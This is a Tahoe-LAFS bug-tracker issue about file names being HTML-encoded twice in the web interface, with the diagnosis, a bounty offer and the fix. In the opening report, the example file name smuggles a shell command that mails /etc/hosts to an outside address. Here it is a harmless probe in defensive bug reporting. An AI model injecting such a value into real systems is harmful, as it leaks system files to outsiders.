Double Encoding in HTML in File Names in WUI #1143
Labels
No Label
0.2.0
0.3.0
0.4.0
0.5.0
0.5.1
0.6.0
0.6.1
0.7.0
0.8.0
0.9.0
1.0.0
1.1.0
1.10.0
1.10.1
1.10.2
1.10a2
1.11.0
1.12.0
1.12.1
1.13.0
1.14.0
1.15.0
1.15.1
1.2.0
1.3.0
1.4.1
1.5.0
1.6.0
1.6.1
1.7.0
1.7.1
1.7β
1.8.0
1.8.1
1.8.2
1.8.3
1.8β
1.9.0
1.9.0-s3branch
1.9.0a1
1.9.0a2
1.9.0b1
1.9.1
1.9.2
1.9.2a1
LeastAuthority.com automation
blocker
cannot reproduce
cloud-branch
code
code-dirnodes
code-encoding
code-frontend
code-frontend-cli
code-frontend-ftp-sftp
code-frontend-magic-folder
code-frontend-web
code-mutable
code-network
code-nodeadmin
code-peerselection
code-storage
contrib
critical
defect
dev-infrastructure
documentation
duplicate
enhancement
fixed
invalid
major
minor
n/a
normal
operational
packaging
somebody else's problem
supercritical
task
trivial
unknown
was already fixed
website
wontfix
worksforme
No Milestone
No Assignees
3 Participants
Notifications
Due Date
No due date set.
Reference: tahoe-lafs/trac-2024-07-25#1143
Loading…
Reference in New Issue
Block a user
No description provided.
Delete Branch "%!s()"
Deleting a branch is permanent. Although the deleted branch may continue to exist for a short time before it actually gets removed, it CANNOT be undone in most cases. Continue?
My file "zumby-bumby ; mail blaggy@mailinator.com < /etc/hosts" in the pubgrid root http://pubgrid.tahoe-lafs.org/uri/URI%3ADIR2%3Actmtx2awdo4xt77x5xxaz6nyxm%3An5t546ddvd6xlv4v6se6sjympbdbvo7orwizuzl42urm73sxazqa/ is listed as "zumby-bumby ; mail blaggy@mailinator.com < /etc/hosts" in the listing.
That is, the < got converted to < and then that ampersand got converted to &. Thus, we end up with <.
HTML entity-encoding is good because it can stop XSS, but be careful: it increases the size of memory you have to allocate to handle the request. Also, double-encoding is just plain incorrect. Single-encode, and place limits on how much memory you will allocate to do the encoding. One way to do this is to include input size limits as part of your input validation framework.
which tools did you use to add and list this file? CLI or WUI?
I've just spotted the likely cause of this bug: at several places in [DirectoryAsHTML.render_row]source:src/allmydata/web/directory.py@5185#L668, we use
T.a(href=...)html.escape(name))
. This is wrong because nevow already escapes the argument toT.a
(if it is a string).I think it only affects the WUI.
I just used freedomsponsors.org to offer USD 25.00 to whoever fixes this issue: http://www.freedomsponsors.org/core/offer/24/double-encoding-in-html-in-file-names-in-wui?alert=SPONSOR&c=s
David-Sarah was right, as strings passed as stan in Nevow are automatically escaped, unless raw() marker is used.
Nevow uses it's own escapeToXML method to do that though, which leaves single/double quotes intact (unless string is used as an attribute), so it doesn't match twisted.web.html.escape() 1-to-1, but I think it should be okay, as it doesn't affect rendering.
Fixed now in 1143_double_encoding_html_filenames branch (non-official repo), github pull request 16.
Since Nevow's
escapeToXML
method leaves single/double quotes intact, could that be used to malicious craft input which would confuse the HTML parser by having embedded quote characters?Replying to zooko:
I don't really see how and don't think I've heard of such things happening, maybe example of what you mean would be helpful?
I can imagine it happening only if malicious person can insert markup somewhere else, i.e. something like this:
But then again, I think if any tags can be inserted, it'll be something like
Fixed by changeset:1df7f114b7094dab.
Replying to zooko:
No, because the input does not occur in an attribute or other quoted context.